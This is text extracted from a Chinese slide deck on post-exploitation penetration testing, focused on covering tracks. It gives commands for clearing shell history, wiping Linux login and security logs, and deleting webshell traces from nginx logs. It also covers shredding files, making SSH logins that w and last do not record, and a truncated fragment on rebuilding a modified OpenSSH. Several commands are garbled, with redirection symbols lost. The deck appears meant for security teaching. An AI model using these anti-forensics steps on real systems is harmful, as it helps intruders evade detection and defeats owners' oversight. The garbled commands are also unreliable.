渗透测试技术 第6章 后渗透测试.pptVIP

痕迹清理 隐藏操作记录 从历史记录中删除指定的命令 输出历史记录中匹配的命令，每?条前?会有个数字。从历史记录中删除那个指定的项： 痕迹清理 隐藏操作记录 删除所有历史记录 # 清空当前历史记录(只是清空缓存中的历史记录，伪删除) history -c # 将当前缓存中的历史记录写入文件(缓存中的记录是空的-用空的数据写入文件，将文件内容删除) history -w 痕迹清理 清除系统日志 Linux 系统存在多种日志文件，来记录系统运行过程中产生的日志。 ``` /var/log/btmp 记录所有登录失败信息，使用lastb命令查看 /var/log/lastlog 记录系统中所有用户最后一次登录时间的日志，使用lastlog命令查看 /var/log/wtmp 记录所有用户的登录、注销信息，使用last命令查看 /var/log/utmp 记录当前已经登录的用户信息，使用w,who,users等命令查看 /var/log/secure 记录与安全相关的日志信息 /var/log/messages 记录系统启动后的信息和错误日志 ``` 痕迹清理 清除系统日志 清除用户最后一次登录时间：echo /var/log/lastlog #lastlog命令 清除当前登录用户的信息：echo /var/log/utmp #使用w,who,users等命令 清除安全日志记录：cat /dev/null /var/log/secure 清除系统日志记录：cat /dev/null /var/log/message 痕迹清理 清除web入侵日志 方法一： ```bash # 使用grep -v来把我们的相关信息删除, cat /var/log/nginx/access.log | grep -v evil.php tmp.log # 把修改过的日志覆盖到原日志文件 cat tmp.log /var/log/nginx/access.log/ ``` 痕迹清理 清除web入侵日志 方法二： ```bash sed -i s/5//g access.log s/需要替换的字符串/替换后的字符串/替换标记 g 表示要替换所有匹配的行 ``` 替换日志ip地址 痕迹清理 文件安全删除工具 shred命令 实现安全的从硬盘上擦除数据，默认覆盖3次，通过 -n指定数据覆盖次数。 shred -f -u -z -v -n 8 1.txt -f, --force 必要时修改权限以使目标可写 -n, --iterations=N 覆盖N 次，而非使用默认的3 次 –random-source=文件 从指定文件中取出随机字节 -s, --size=N 粉碎数据为指定字节的碎片(可使用K、M 和G 作为单位) -u, --remove 覆盖后截断并删除文件 -v, --verbose 显示详细信息 -x, --exact 不将文件大小增加至最接近的块大小 -z, --zero 最后一次使用0 进行覆盖以隐藏覆盖动作 -help 显示此帮助信息并退出 -version 显示版本信息并退出 痕迹清理 隐藏远程SSH登陆记录 隐身登录系统，不会被w、last等指令检测到。 ssh -T root@ip /bin/bash –i -T表示不分配伪终端 bin/bash 表示在登录后调用bash命令 -i 表示是交互式shell 登录时不将ssh公钥保存在本地.ssh目录中： ssh -o UserKnownHostsFile=/dev/null -T root@ip /bin/bash -i 信息收集 权限提升 横向移动 权限维持 痕迹清除 总结/PREFACE 感 谢 观 看! * * * * * * cd openssh-8.2p1/ chmod +x configure #有些环境可能需要安装一些依赖， apt-get install libpam0g-dev libselinux1-dev #卸载原来的，重新安装修改的 clear;rm -rf /usr/local/share/man/man5/authorized_keys.5;rm -rf ~/.ssh;make clean; ./configure --with-zlib --with-ssl-dir --with-pam --bindir=/usr/bin --sbindir=/usr/sbin --sysconfdir=/etc/ssh --with-md5-passwords --with-selinux --with-privsep-path=/run/sshd ; m